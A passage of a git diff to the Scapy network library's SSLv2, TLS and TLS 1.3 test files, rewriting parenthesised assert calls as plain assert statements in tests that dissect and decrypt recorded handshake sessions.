t.msg[0] -assert(isinstance(cc, SSLv2ClientCertificate)) -assert(cc.msgtype == 8) -assert(cc.certtype == 1) -assert(cc.certlen == 930) -assert(cc.responselen == 256) -assert(isinstance(cc.certdata, Cert)) -assert(len(cc.certdata.der) == 930) -assert(cc.certdata.subject_str == '/C=MN/L=Ulaanbaatar/OU=Scapy Test PKI/CN=Scapy Test Client') -assert(len(cc.responsedata.sig_val) == 256) +assert isinstance(cc, SSLv2ClientCertificate) +assert cc.msgtype == 8 +assert cc.certtype == 1 +assert cc.certlen == 930 +assert cc.responselen == 256 +assert isinstance(cc.certdata, Cert) +assert len(cc.certdata.der) == 930 +assert cc.certdata.subject_str == '/C=MN/L=Ulaanbaatar/OU=Scapy Test PKI/CN=Scapy Test Client' +assert len(cc.responsedata.sig_val) == 256 cc.responsedata.sig_val[:4] == b"\x81#\x95\xb5" and cc.responsedata.sig_val[-4:] == b"RM6\xd3" = Reading SSLv2 session - ServerFinished t = SSLv2(sf, tls_session=t.tls_session.mirror()) sf = t.msg[0] -assert(isinstance(sf, SSLv2ServerFinished)) -assert(sf.msgtype == 6) +assert isinstance(sf, SSLv2ServerFinished) +assert sf.msgtype == 6 sf.sid == binascii.unhexlify('11c1e8070b2cf249ad3d85caf8854bc8') = Reading SSLv2 session - Application data t1 = SSLv2(d1, tls_session=t.tls_session.mirror()) data1 = t1.msg[0] -assert(isinstance(data1, Raw)) -assert(data1.load == b'These are horrendous parameters for a TLS session.\n') +assert isinstance(data1, Raw) +assert data1.load == b'These are horrendous parameters for a TLS session.\n' t2 = SSLv2(d2, tls_session=t1.tls_session) data2 = t2.msg[0] -assert(isinstance(data2, Raw)) +assert isinstance(data2, Raw) data2.load == b'*nothing to do here*\n' = Reading SSLv2 session - Checking final sequence numbers @@ -184,14 +184,14 @@ t2.tls_session.rcs.seq_num == 6 and t2.tls_session.wcs.seq_num == 4 = Check TLS-related scapy internals - Checking raw() harmlessness (with RC4) t1.show() -assert(t1.msg[0].load == b'These are horrendous parameters for a TLS session.\n') -assert(t1.tls_session.rcs.seq_num == 6 and t1.tls_session.wcs.seq_num == 4) +assert t1.msg[0].load == b'These are horrendous parameters for a TLS session.\n' +assert t1.tls_session.rcs.seq_num == 6 and t1.tls_session.wcs.seq_num == 4 d1 == raw(t1) = Check TLS-related scapy internals - Checking show2() harmlessness (with RC4) t2.show2() -assert(t2.msg[0].load == b'*nothing to do here*\n') -assert(t2.tls_session.rcs.seq_num == 6 and t2.tls_session.wcs.seq_num == 4) +assert t2.msg[0].load == b'*nothing to do here*\n' +assert t2.tls_session.rcs.seq_num == 6 and t2.tls_session.wcs.seq_num == 4 d2 == raw(t2) = Check TLS-related scapy internals - Checking show2() harmlessness (with 3DES) @@ -212,10 +212,10 @@ t.show2() t = SSLv2(sv, tls_session=t.tls_session.mirror()) t.show2() t.show2() -assert(t.padlen == 7) -assert(t.mac == b'\xe7\xe4\x08\x0e\x86\xc4\x93\t\x80l/\x80\xdaQ\xa0z') -assert(t.tls_session.rcs.seq_num == 2) -assert(t.tls_session.wcs.seq_num == 2) +assert t.padlen == 7 +assert t.mac == b'\xe7\xe4\x08\x0e\x86\xc4\x93\t\x80l/\x80\xdaQ\xa0z' +assert t.tls_session.rcs.seq_num == 2 +assert t.tls_session.wcs.seq_num == 2 t.msg[0].challenge == challenge = Check TLS-related scapy internals - Checking tls_session freeze during show2() @@ -225,7 +225,7 @@ l == len(t.tls_session.handshake_messages) = Check TLS-related scapy internals - Checking SSLv2 cast from TLS class t = TLS(ch) -assert(isinstance(t, SSLv2)) +assert isinstance(t, SSLv2) t.msg[0].challenge == challenge @@ -267,9 +267,9 @@ t.tls_session.sslv2_connection_id = b'\xba'*16 t.tls_session.sslv2_challenge = b'\x42'*16 t.raw_stateful() s = t.tls_session -assert(s.master_secret == b'\xff'*19 + b'\xaa'*5) -assert(isinstance(s.rcs.ciphersuite, SSL_CK_DES_192_EDE3_CBC_WITH_MD5)) -assert(isinstance(s.wcs.ciphersuite, SSL_CK_DES_192_EDE3_CBC_WITH_MD5)) +assert s.master_secret == b'\xff'*19 + b'\xaa'*5 +assert isinstance(s.rcs.ciphersuite, SSL_CK_DES_192_EDE3_CBC_WITH_MD5) +assert isinstance(s.wcs.ciphersuite, SSL_CK_DES_192_EDE3_CBC_WITH_MD5) s.rcs.cipher.iv == b'\x01'*8 s.wcs.cipher.iv == b'\x01'*8 diff --git a/test/tls.uts b/test/tls.uts index 3161b307b69..04dcda2ff39 100644 --- a/test/tls.uts +++ b/test/tls.uts @@ -784,12 +784,12 @@ t4 = TLS(p4_certstat_ske_shd, tls_session=t3.tls_session) = Reading TLS test session - TLS Record header # We leave the possibility for some attributes to be either '' or None. -assert(t1.type == 0x16) -assert(t1.version == 0x0301) -assert(t1.len == 213) -assert(not t1.iv) -assert(not t1.mac) -assert(not t1.pad and not t1.padlen) +assert t1.type == 0x16 +assert t1.version == 0x0301 +assert t1.len == 213 +assert not t1.iv +assert not t1.mac +assert not t1.pad and not t1.padlen len(t1.msg) == 1 @@ -799,18 +799,18 @@ TLSClientHello in t1 = Reading TLS test session - ClientHello ch = t1.msg[0] -assert(isinstance(ch, TLSClientHello)) -assert(ch.msgtype == 1) -assert(ch.msglen == 209) -assert(ch.version == 0x0303) -assert(ch.gmt_unix_time == 0x17f24dc3) -assert(ch.random_bytes == b'|\x19\xdb\xc3<\xb5J\x0b\x8d5\x81\xc5\xce\t 2\x08\xd8\xec\xd1\xf8"B\x9cW\xd0\x16v') -assert(ch.sidlen == 0) -assert(not ch.sid) -assert(ch.cipherslen == 22) -assert(ch.ciphers == [49195, 49199, 49162, 49161, 49171, 49172, 51, 57, 47, 53, 10]) -assert(ch.complen == 1) -assert(ch.comp == [0]) +assert isinstance(ch, TLSClientHello) +assert ch.msgtype == 1 +assert ch.msglen == 209 +assert ch.version == 0x0303 +assert ch.gmt_unix_time == 0x17f24dc3 +assert ch.random_bytes == b'|\x19\xdb\xc3<\xb5J\x0b\x8d5\x81\xc5\xce\t 2\x08\xd8\xec\xd1\xf8"B\x9cW\xd0\x16v' +assert ch.sidlen == 0 +assert not ch.sid +assert ch.cipherslen == 22 +assert ch.ciphers == [49195, 49199, 49162, 49161, 49171, 49172, 51, 57, 47, 53, 10] +assert ch.complen == 1 +assert ch.comp == [0] = Reading TLS test session - ClientHello extensions @@ -820,58 +820,58 @@ TLS_Ext_SupportedPointFormat, TLS_Ext_SessionTicket, TLS_Ext_NPN, TLS_Ext_ALPN, TLS_Ext_SignatureAlgorithms, TLS_Ext_CSR, OCSPStatusRequest) -assert(ch.extlen == 146) +assert ch.extlen == 146 ext = ch.ext -assert(len(ext) == 9) -assert(isinstance(ext[0], TLS_Ext_ServerName)) -assert(ext[0].type == 0) -assert(ext[0].len == 31) -assert(ext[0].servernameslen == 29) -assert(len(ext[0].servernames) == 1) -assert(ext[0].servernames[0].nametype == 0) -assert(ext[0].servernames[0].namelen == 26) -assert(ext[0].servernames[0].servername == b"camo.githubusercontent.com") -assert(isinstance(ext[1], TLS_Ext_RenegotiationInfo)) -assert(not ext[1].renegotiated_connection) -assert(isinstance(ext[2], TLS_Ext_SupportedGroups)) -assert(ext[2].groups == [0x17, 0x18, 0x19]) -assert(isinstance(ext[3], TLS_Ext_SupportedPointFormat)) -assert(ext[3].ecpl == [0]) -assert(isinstance(ext[4], TLS_Ext_SessionTicket)) -assert(not ext[4].ticket) -assert(isinstance(ext[5], TLS_Ext_NPN)) -assert(ext[5].protocols == []) -assert(isinstance(ext[6], TLS_Ext_ALPN)) -assert(len(ext[6].protocols) == 6) -assert(ext[6].protocols[-1].protocol == b"http/1.1") -assert(isinstance(ext[7], TLS_Ext_CSR)) -assert(isinstance(ext[7].req[0], OCSPStatusRequest)) -assert(isinstance(ext[8], TLS_Ext_SignatureAlgorithms)) -assert(len(ext[8].sig_algs) == 10) +assert len(ext) == 9 +assert isinstance(ext[0], TLS_Ext_ServerName) +assert ext[0].type == 0 +assert ext[0].len == 31 +assert ext[0].servernameslen == 29 +assert len(ext[0].servernames) == 1 +assert ext[0].servernames[0].nametype == 0 +assert ext[0].servernames[0].namelen == 26 +assert ext[0].servernames[0].servername == b"camo.githubusercontent.com" +assert isinstance(ext[1], TLS_Ext_RenegotiationInfo) +assert not ext[1].renegotiated_connection +assert isinstance(ext[2], TLS_Ext_SupportedGroups) +assert ext[2].groups == [0x17, 0x18, 0x19] +assert isinstance(ext[3], TLS_Ext_SupportedPointFormat) +assert ext[3].ecpl == [0] +assert isinstance(ext[4], TLS_Ext_SessionTicket) +assert not ext[4].ticket +assert isinstance(ext[5], TLS_Ext_NPN) +assert ext[5].protocols == [] +assert isinstance(ext[6], TLS_Ext_ALPN) +assert len(ext[6].protocols) == 6 +assert ext[6].protocols[-1].protocol == b"http/1.1" +assert isinstance(ext[7], TLS_Ext_CSR) +assert isinstance(ext[7].req[0], OCSPStatusRequest) +assert isinstance(ext[8], TLS_Ext_SignatureAlgorithms) +assert len(ext[8].sig_algs) == 10 ext[8].sig_algs[-1] == 0x0202 = Reading TLS test session - ServerHello from scapy.layers.tls.handshake import TLSServerHello -assert(TLSServerHello in t2) +assert TLSServerHello in t2 sh = t2.msg[0] -assert(isinstance(sh, TLSServerHello)) -assert(sh.gmt_unix_time == 0x46076ee2) -assert(sh.random_bytes == b'\x0c\x97g\xb7o\xb6\x9b\x14\x19\xbd\xdd1\x80@\xaaQ+\xc2,\x19\x15"\x82\xe8\xc5,\xe8\x12') -assert(sh.cipher == 0xc02f) -assert(len(sh.ext) == 6) +assert isinstance(sh, TLSServerHello) +assert sh.gmt_unix_time == 0x46076ee2 +assert sh.random_bytes == b'\x0c\x97g\xb7o\xb6\x9b\x14\x19\xbd\xdd1\x80@\xaaQ+\xc2,\x19\x15"\x82\xe8\xc5,\xe8\x12' +assert sh.cipher == 0xc02f +assert len(sh.ext) == 6 sh.ext[-1].protocols[-1].protocol == b"http/1.1" = Reading TLS test session - Certificate from scapy.layers.tls.cert import Cert cert = t3.msg[0] -assert(cert.certslen == 2670) -assert(len(cert.certs) == 2) +assert cert.certslen == 2670 +assert len(cert.certs) == 2 srv_cert = cert.certs[0][1] -assert(isinstance(srv_cert, Cert)) -assert(srv_cert.serial == 0x077a5dc3362301f989fe54f7f86f3e64) +assert isinstance(srv_cert, Cert) +assert srv_cert.serial == 0x077a5dc3362301f989fe54f7f86f3e64 srv_cert.subject['commonName'] == 'www.github.com' @@ -884,8 +884,8 @@ isinstance(t4.payload.payload.payload, NoPayload) = Reading TLS test session - CertificateStatus from scapy.layers.tls.handshake import TLSCertificateStatus -assert(isinstance(cert_stat, TLSCertificateStatus)) -assert(cert_stat.responselen == 471) +assert isinstance(cert_stat, TLSCertificateStatus) +assert cert_stat.responselen == 471 cert_stat.response[0].responseStatus == 0 # we leave the remaining OCSP tests to x509.uts @@ -893,33 +893,33 @@ cert_stat.response[0].responseStatus == 0 = Reading TLS test session - ServerKeyExchange from scapy.layers.tls.handshake import TLSServerKeyExchange from scapy.layers.tls.keyexchange import ServerECDHNamedCurveParams -assert(isinstance(ske, TLSServerKeyExchange)) +assert isinstance(ske, TLSServerKeyExchange) p = ske.params -assert(isinstance(p, ServerECDHNamedCurveParams)) -assert(p.named_curve == 0x0017) -assert(orb(p.point[0]) == 4 and p.point[1:5] == b'\xc3\x9d\x1cD' and p.point[-4:] == b'X\x19\x03u') -assert(ske.sig.sig_alg == 0x0601) +assert isinstance(p, ServerECDHNamedCurveParams) +assert p.named_curve == 0x0017 +assert orb(p.point[0]) == 4 and p.point[1:5] == b'\xc3\x9d\x1cD' and p.point[-4:] == b'X\x19\x03u' +assert ske.sig.sig_alg == 0x0601 ske.sig.sig_val[:4] == b'y\x8aQ\x11' and ske.sig.sig_val[-4:] == b'`15\xef' = Reading TLS test session - ServerHelloDone from scapy.layers.tls.handshake import TLSServerHelloDone -assert(isinstance(shd, TLSServerHelloDone)) +assert isinstance(shd, TLSServerHelloDone) shd.msglen == 0 = Reading TLS test session - Context checks after 1st RTT t = shd.tls_session -assert(len(t.handshake_messages) == 6) -assert(t.handshake_messages_parsed[-1] is shd) -assert(t.tls_version == 0x0303) -assert(t.client_kx_ffdh_params is None) -assert(t.client_kx_ecdh_params is not None) +assert len(t.handshake_messages) == 6 +assert t.handshake_messages_parsed[-1] is shd +assert t.tls_version == 0x0303 +assert t.client_kx_ffdh_params is None +assert t.client_kx_ecdh_params is not None pn = t.server_kx_pubkey.public_numbers() x = pkcs_i2osp(pn.x, pn.curve.key_size/8) y = pkcs_i2osp(pn.y, pn.curve.key_size/8) -assert(x[:4] == b'\xc3\x9d\x1cD' and y[-4:] == b'X\x19\x03u') -assert(t.rcs.row == "read") -assert(t.wcs.row == "write") +assert x[:4] == b'\xc3\x9d\x1cD' and y[-4:] == b'X\x19\x03u' +assert t.rcs.row == "read" +assert t.wcs.row == "write" t.rcs.ciphersuite.val == 0 @@ -937,28 +937,28 @@ ccs = t5.payload.msg[0] rec_fin = t5.payload.payload fin = t5.payload.payload.msg[0] isinstance(t5.payload.payload.payload, NoPayload) -assert(isinstance(cke, TLSClientKeyExchange)) +assert isinstance(cke, TLSClientKeyExchange) k = cke.exchkeys -assert(isinstance(k, ClientECDiffieHellmanPublic)) -assert(k.ecdh_Yclen == 65) -assert(k.ecdh_Yc[:4] == b'\x04\xd2\x07\xce' and k.ecdh_Yc[-4:] == b'\xdc\x86[\xe7') +assert isinstance(k, ClientECDiffieHellmanPublic) +assert k.ecdh_Yclen == 65 +assert k.ecdh_Yc[:4] == b'\x04\xd2\x07\xce' and k.ecdh_Yc[-4:] == b'\xdc\x86[\xe7' = Reading TLS test session - ChangeCipherSpec from scapy.layers.tls.record import TLSChangeCipherSpec -assert(isinstance(ccs, TLSChangeCipherSpec)) +assert isinstance(ccs, TLSChangeCipherSpec) ccs.msgtype == 1 = Reading TLS test session - Finished -assert(rec_fin.version == 0x0303) -assert(rec_fin.deciphered_len == 16) -assert(rec_fin.len == 40) -assert(rec_fin.iv == b'\x00\x00\x00\x00\x00\x00\x00\x00') -assert(rec_fin.mac == b'\xc7^\xc1\x8e\x81M\xff\x00\x0f}G\xf2\x8c\xab\n=') -assert(not rec_fin.pad and not rec_fin.padlen) +assert rec_fin.version == 0x0303 +assert rec_fin.deciphered_len == 16 +assert rec_fin.len == 40 +assert rec_fin.iv == b'\x00\x00\x00\x00\x00\x00\x00\x00' +assert rec_fin.mac == b'\xc7^\xc1\x8e\x81M\xff\x00\x0f}G\xf2\x8c\xab\n=' +assert not rec_fin.pad and not rec_fin.padlen from scapy.layers.tls.record import _TLSEncryptedContent -assert(isinstance(fin, _TLSEncryptedContent)) +assert isinstance(fin, _TLSEncryptedContent) fin.load == b'\xd9\xcb,\x8cM\xfd\xbc9\xaa\x05\xf3\xd3\xf3Z\x8a-' @@ -966,17 +966,17 @@ fin.load == b'\xd9\xcb,\x8cM\xfd\xbc9\xaa\x05\xf3\xd3\xf3Z\x8a-' from scapy.layers.tls.handshake import TLSNewSessionTicket t6 = TLS(p6_tick_ccs_fin, tls_session=t5.tls_session.mirror()) tick = t6.msg[0] -assert(isinstance(tick, TLSNewSessionTicket)) -assert(tick.msgtype == 4) -assert(tick.lifetime == 1200) -assert(tick.ticketlen == 192) -assert(tick.ticket[:4] == b'c\xccwJ' and tick.ticket[-4:] == b'\xf3.\xcf\x04') +assert isinstance(tick, TLSNewSessionTicket) +assert tick.msgtype == 4 +assert tick.lifetime == 1200 +assert tick.ticketlen == 192 +assert tick.ticket[:4] == b'c\xccwJ' and tick.ticket[-4:] == b'\xf3.\xcf\x04' ccs = t6.payload.msg[0] -assert(isinstance(ccs, TLSChangeCipherSpec)) +assert isinstance(ccs, TLSChangeCipherSpec) rec_fin = t6.getlayer(4) -assert(rec_fin.iv == b'\xd8m\x92\t5YZ:') -assert(rec_fin.mac == b'\xecguD\xa8\x87$<7+\n\x94\x1e9\x96\xfa') -assert(isinstance(rec_fin.msg[0], _TLSEncryptedContent)) +assert rec_fin.iv == b'\xd8m\x92\t5YZ:' +assert rec_fin.mac == b'\xecguD\xa8\x87$<7+\n\x94\x1e9\x96\xfa' +assert isinstance(rec_fin.msg[0], _TLSEncryptedContent) rec_fin.msg[0].load == b'7\\)`\xaa`\x7ff\xcd\x10\xa9v\xa3*\x17\x1a' = Building x25519 ecdh_Yc @@ -1090,10 +1090,10 @@ assert pkt[TLS].msg[0].lifetime == 3600 = Reading TLS test session - ApplicationData t7 = TLS(p7_data, tls_session=t6.tls_session.mirror()) -assert(t7.iv == b'\x00\x00\x00\x00\x00\x00\x00\x01') -assert(t7.mac == b'>\x1dLb5\x8e+\x01n\xcb\x19\xcc\x17Ey\xc8') -assert(not t7.pad and not t7.padlen) -assert(isinstance(t7.msg[0], _TLSEncryptedContent)) +assert t7.iv == b'\x00\x00\x00\x00\x00\x00\x00\x01' +assert t7.mac == b'>\x1dLb5\x8e+\x01n\xcb\x19\xcc\x17Ey\xc8' +assert not t7.pad and not t7.padlen +assert isinstance(t7.msg[0], _TLSEncryptedContent) len(t7.msg[0].load) == 478 = Reading TLS msg dissect - Packet too small @@ -1193,9 +1193,9 @@ t.tls_session.server_rsa_key = key t = TLS(ck, tls_session=t.tls_session.mirror()) t = TLS(fin, tls_session=t.tls_session.mirror()) t = TLS(data, tls_session=t.tls_session.mirror()) -assert(len(t.msg) == 1) -assert(isinstance(t.msg[0], TLSApplicationData)) -assert(t.msg[0].data == b"") +assert len(t.msg) == 1 +assert isinstance(t.msg[0], TLSApplicationData) +assert t.msg[0].data == b"" t.getlayer(TLS, 2).msg[0].data == b"To boldly go where no man has gone before...\n" = Auto provide the session @@ -1289,18 +1289,18 @@ from scapy.layers.tls.crypto.cipher_block import Cipher_AES_256_CBC sh = TLSServerHello(gmt_unix_time=0x41414141, random_bytes='B'*28, cipher=0xc014) t = TLS(msg=sh) t.raw_stateful() -assert(isinstance(t.tls_session.pwcs.ciphersuite, TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA)) -assert(isinstance(t.tls_session.pwcs.key_exchange, KX_ECDHE_RSA)) -assert(isinstance(t.tls_session.pwcs.cipher, Cipher_AES_256_CBC)) -assert(isinstance(t.tls_session.pwcs.hmac, Hmac_SHA)) +assert isinstance(t.tls_session.pwcs.ciphersuite, TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA) +assert isinstance(t.tls_session.pwcs.key_exchange, KX_ECDHE_RSA) +assert isinstance(t.tls_session.pwcs.cipher, Cipher_AES_256_CBC) +assert isinstance(t.tls_session.pwcs.hmac, Hmac_SHA) t.tls_session.server_random == b'A'*4+b'B'*28 = Building packets - ChangeCipherSpec with forged, forbidden field values t = TLS(msg=TLSChangeCipherSpec()) -assert(raw(t) == b'\x14\x03\x03\x00\x01\x01') +assert raw(t) == b'\x14\x03\x03\x00\x01\x01' t.len = 0 -assert(raw(t) == b'\x14\x03\x03\x00\x00\x01') +assert raw(t) == b'\x14\x03\x03\x00\x00\x01' t.type = 0xde t.version = 0xadbe t.len = 0xefff @@ -1579,7 +1579,7 @@ if shutil.which("editcap"): pcap_path = scapy_path("doc/notebooks/tls/raw_data/tls_nss_example.pcap") pcapng_path = get_temp_file() exit_status = os.system("editcap --inject-secrets tls,%s %s %s" % (key_log_path, pcap_path, pcapng_path)) - assert(exit_status == 0) + assert exit_status == 0 packets = rdpcap(pcapng_path) assert b"GET /secret.txt HTTP/1.0\n" in packets[11].msg[0].data assert b"z2|gxarIKOxt,G1d>.Q2MzGY[k@" in packets[13].msg[0].data diff --git a/test/tls13.uts b/test/tls13.uts index 6d8463cdc45..f5eb67d33b2 100644 --- a/test/tls13.uts +++ b/test/tls13.uts @@ -92,12 +92,12 @@ t2 = TLS(serverHello, tls_session=t1.tls_session.mirror()) = Reading TLS 1.3 session - TLS Record header # We leave the possibility for some attributes to be either '' or None. -assert(t1.type == 0x16) -assert(t1.version == 0x0301) -assert(t1.len == 196) -assert(not t1.iv) -assert(not t1.mac) -assert(not t1.pad and not t1.padlen) +assert t1.type == 0x16 +assert t1.version == 0x0301 +assert t1.len == 196 +assert not t1.iv +assert not t1.mac +assert not t1.pad and not t1.padlen len(t1.msg) == 1 @@ -108,18 +108,18 @@ TLSClientHello in t1 = Reading TLS 1.3 session - ClientHello ch = t1.msg[0] -assert(isinstance(ch, TLSClientHello)) -assert(ch.msgtype == 1) -assert(ch.msglen == 192) -assert(ch.version == 0x0303) -assert(ch.gmt_unix_time == 0xcb34ecb1) -assert(ch.random_bytes == b'\xe7\x81c\xba\x1c8\xc6\xda\xcb\x19jm\xff\xa2\x1a\x8d\x99\x12\xec\x18\xa2\xefb\x83\x02M\xec\xe7') -assert(ch.sidlen == 0) -assert(not ch.sid) -assert(ch.cipherslen == 6) -assert(ch.ciphers == [4865, 4867, 4866]) -assert(ch.complen == 1) -assert(ch.comp == [0]) +assert isinstance(ch, TLSClientHello) +assert ch.msgtype == 1 +assert ch.msglen == 192 +assert ch.version == 0x0303 +assert ch.gmt_unix_time == 0xcb34ecb1 +assert ch.random_bytes == b'\xe7\x81c\xba\x1c8\xc6\xda\xcb\x19jm\xff\xa2\x1a\x8d\x99\x12\xec\x18\xa2\xefb\x83\x02M\xec\xe7' +assert ch.sidlen == 0 +assert not ch.sid +assert ch.cipherslen == 6 +assert ch.ciphers == [4865, 4867, 4866] +assert ch.complen == 1 +assert ch.comp == [0] = Reading TLS 1.3 session - ClientHello extensions @@ -131,43 +131,43 @@ TLS_Ext_RecordSizeLimit) from scapy.layers.tls.keyexchange_tls13 import TLS_Ext_KeyShare_CH -assert(ch.extlen == 145) +assert ch.extlen == 145 ext = ch.ext -assert(len(ext) == 9) -assert(isinstance(ext[0], TLS_Ext_ServerName)) -assert(ext[0].type == 0) -assert(ext[0].len == 11) -assert(ext[0].servernameslen == 9) -assert(len(ext[0].servernames) == 1) -assert(ext[0].servernames[0].nametype == 0) -assert(ext[0].servernames[0].namelen == 6) -assert(ext[0].servernames[0].servername == b"server") -assert(isinstance(ext[1], TLS_Ext_RenegotiationInfo)) -assert(not ext[1].renegotiated_connection) -assert(isinstance(ext[2], TLS_Ext_SupportedGroups)) -assert(ext[2].groups == [29, 23, 24, 25, 256, 257, 258, 259, 260]) -assert(isinstance(ext[3], TLS_Ext_SessionTicket)) -assert(not ext[3].ticket) -assert(isinstance(ext[4], TLS_Ext_KeyShare_CH)) -assert(ext[4].client_shares_len == 36) -assert(len(ext[4].client_shares) == 1) -assert(ext[4].client_shares[0].group == 29) -assert(ext[4].client_shares[0].kxlen == 32) -assert(ext[4].client_shares[0].key_exchange == b'\x998\x1d\xe5`\xe4\xbdC\xd2=\x8eCZ}\xba\xfe\xb3\xc0nQ\xc1<\xaeMT\x13i\x1eR\x9a\xaf,') -assert(isinstance(ext[5],TLS_Ext_SupportedVersion_CH)) -assert(ext[5].len == 3) -assert(ext[5].versionslen == 2) -assert(ext[5].versions == [772]) -assert(isinstance(ext[6], TLS_Ext_SignatureAlgorithms)) -assert(ext[6].sig_algs_len == 30) -assert(len(ext[6].sig_algs) == 15) -assert(ext[6].sig_algs[0] == 1027) -assert(ext[6].sig_algs[-1] == 514) -assert(isinstance(ext[7], TLS_Ext_PSKKeyExchangeModes)) -assert(ext[7].kxmodeslen == 1) -assert(ext[7].kxmodes[0] == 1) -assert(isinstance(ext[8], TLS_Ext_RecordSizeLimit)) -assert(ext[8].record_size_limit == 16385) +assert len(ext) == 9 +assert isinstance(ext[0], TLS_Ext_ServerName) +assert ext[0].type == 0 +assert ext[0].len == 11 +assert ext[0].servernameslen == 9 +assert len(ext[0].servernames) == 1 +assert ext[0].servernames[0].nametype == 0 +assert ext[0].servernames[0].namelen == 6 +assert ext[0].servernames[0].servername == b"server" +assert isinstance(ext[1], TLS_Ext_RenegotiationInfo) +assert not ext[1].renegotiated_connection +assert isinstance(ext[2], TLS_Ext_SupportedGroups) +assert ext[2].groups == [29, 23, 24, 25, 256, 257, 258, 259, 260] +assert isinstance(ext[3], TLS_Ext_SessionTicket) +assert not ext[3].ticket +assert isinstance(ext[4], TLS_Ext_KeyShare_CH) +assert ext[4].client_shares_len == 36 +assert len(ext[4].client_shares) == 1 +assert ext[4].client_shares[0].group == 29 +assert ext[4].client_shares[0].kxlen == 32 +assert ext[4].client_shares[0].key_exchange == b'\x998\x1d\xe5`\xe4\xbdC\xd2=\x8eCZ}\xba\xfe\xb3\xc0nQ\xc1<\xaeMT\x13i\x1eR\x9a\xaf,' +assert isinstance(ext[5],TLS_Ext_SupportedVersion_CH) +assert ext[5].len == 3 +assert ext[5].versionslen == 2 +assert ext[5].versions == [772] +assert isinstance(ext[6], TLS_Ext_SignatureAlgorithms) +assert ext[6].sig_algs_len == 30 +assert len(ext[6].sig_algs) == 15 +assert ext[6].sig_algs[0] == 1027 +assert ext[6].sig_algs[-1] == 514 +assert isinstance(ext[7], TLS_Ext_PSKKeyExchangeModes) +assert ext[7].kxmodeslen == 1 +assert ext[7].kxmodes[0] == 1 +assert isinstance(ext[8], TLS_Ext_RecordSizeLimit) +assert ext[8].record_size_limit == 16385 = Reading TLS 1.3 session - ServerHello @@ -175,19 +175,19 @@ from scapy.layers.tls.handshake import TLS13ServerHello from scapy.layers.tls.extensions import TLS_Ext_SupportedVersion_SH from scapy.layers.tls.keyexchange_tls13 import TLS_Ext_KeyShare_SH -assert(TLS13ServerHello in t2) +assert TLS13ServerHello in t2 sh = t2.msg[0] ext = sh.ext -assert(isinstance(sh, TLS13ServerHello)) -assert(sh.random_bytes == b'\xa6\xaf\x06\xa4\x12\x18`\xdc^n`$\x9c\xd3L\x95\x93\x0c\x8a\xc5\xcb\x144\xda\xc1Uw.\xd3\xe2i(') -assert(sh.cipher == 0x1301) -assert(len(sh.ext) == 2) -assert(isinstance(ext[0], TLS_Ext_KeyShare_SH)) -assert(ext[0].len == 36) -assert(ext[0].server_share.group == 29) -assert(ext[0].server_share.key_exchange == b'\xc9\x82\x88v\x11 \x95\xfefv+\xdb\xf7\xc6r\xe1V\xd6\xcc%;\x83=\xf1\xddi\xb1\xb0Nu\x1f\x0f') -assert(isinstance(ext[1], TLS_Ext_SupportedVersion_SH)) -assert(ext[1].version == 0x0304) +assert isinstance(sh, TLS13ServerHello) +assert sh.random_bytes == b'\xa6\xaf\x06\xa4\x12\x18`\xdc^n`$\x9c\xd3L\x95\x93\x0c\x8a\xc5\xcb\x144\xda\xc1Uw.\xd3\xe2i(' +assert sh.cipher == 0x1301 +assert len(sh.ext) == 2 +assert isinstance(ext[0], TLS_Ext_KeyShare_SH) +assert ext[0].len == 36 +assert ext[0].server_share.group == 29 +assert ext[0].server_share.key_exchange == b'\xc9\x82\x88v\x11 \x95\xfefv+\xdb\xf7\xc6r\xe1V\xd6\xcc%;\x83=\xf1\xddi\xb1\xb0Nu\x1f\x0f' +assert isinstance(ext[1], TLS_Ext_SupportedVersion_SH) +assert ext[1].version == 0x0304 = Reading TLS 1.3 session - TLS parsing (with encryption) does not throw any error @@ -196,9 +196,9 @@ t3 = TLS13(serverEncHS, tls_session=t2.tls_session) = Reading TLS 1.3 session - TLS13 Record header -assert(t3.type == 0x17) -assert(t3.version == 0x0303) -assert(t3.len == 674) +assert t3.type == 0x17 +assert t3.version == 0x0303 +assert t3.len == 674 = Reading TLS 1.3 session - TLS13 Record __getitem__ @@ -207,8 +207,8 @@ TLS13 in t3 = Reading TLS 1.3 session - TLS13 ApplicationData from scapy.layers.tls.record_tls13 import TLSInnerPlaintext TLSInnerPlaintext in t3 -assert(len(t3.auth_tag) == 16) -assert(t3.auth_tag == b'\xbf\x02S\xfeQu\xbe\x89\x8eu\x0e\xdcS7\r+') +assert len(t3.auth_tag) == 16 +assert t3.auth_tag == b'\xbf\x02S\xfeQu\xbe\x89\x8eu\x0e\xdcS7\r+' + Decrypt a TLS 1.3 session @@ -230,27 +230,27 @@ x25519_clt_pub = clean(""" """) t = TLS(clientHello) -assert(len(t.msg) == 1) -assert(t.msg[0].msgtype == 1) -assert(t.msg[0].extlen == 145) -assert(len(t.msg[0].ext) == 9) +assert len(t.msg) == 1 +assert t.msg[0].msgtype == 1 +assert t.msg[0].extlen == 145 +assert len(t.msg[0].ext) == 9 e = t.msg[0].ext -assert(isinstance(e[0], TLS_Ext_ServerName)) -assert(isinstance(e[1], TLS_Ext_RenegotiationInfo)) -assert(isinstance(e[2], TLS_Ext_SupportedGroups)) -assert(isinstance(e[3],TLS_Ext_SessionTicket)) -assert(e[3].len == 0) -assert(isinstance(e[4], TLS_Ext_KeyShare_CH)) -assert(len(e[4].client_shares) == 1) -assert(e[4].client_shares[0].group == 29) -assert(e[4].client_shares[0].key_exchange == x25519_clt_pub) -assert(isinstance(e[5], TLS_Ext_SupportedVersion_CH)) -assert(isinstance(e[6], TLS_Ext_SignatureAlgorithms)) -assert(isinstance(e[7], TLS_Ext_PSKKeyExchangeModes)) -assert(e[7].kxmodeslen == 1) -assert(len(e[7].kxmodes) == 1) -assert(e[7].kxmodes[0] == 1) -assert(isinstance(e[8], TLS_Ext_RecordSizeLimit)) +assert isinstance(e[0], TLS_Ext_ServerName) +assert isinstance(e[1], TLS_Ext_RenegotiationInfo) +assert isinstance(e[2], TLS_Ext_SupportedGroups) +assert isinstance(e[3],TLS_Ext_SessionTicket) +assert e[3].len == 0 +assert isinstance(e[4], TLS_Ext_KeyShare_CH) +assert len(e[4].client_shares) == 1 +assert e[4].client_shares[0].group == 29 +assert e[4].client_shares[0].key_exchange == x25519_clt_pub +assert isinstance(e[5], TLS_Ext_SupportedVersion_CH) +assert isinstance(e[6], TLS_Ext_SignatureAlgorithms) +assert isinstance(e[7], TLS_Ext_PSKKeyExchangeModes) +assert e[7].kxmodeslen == 1 +assert 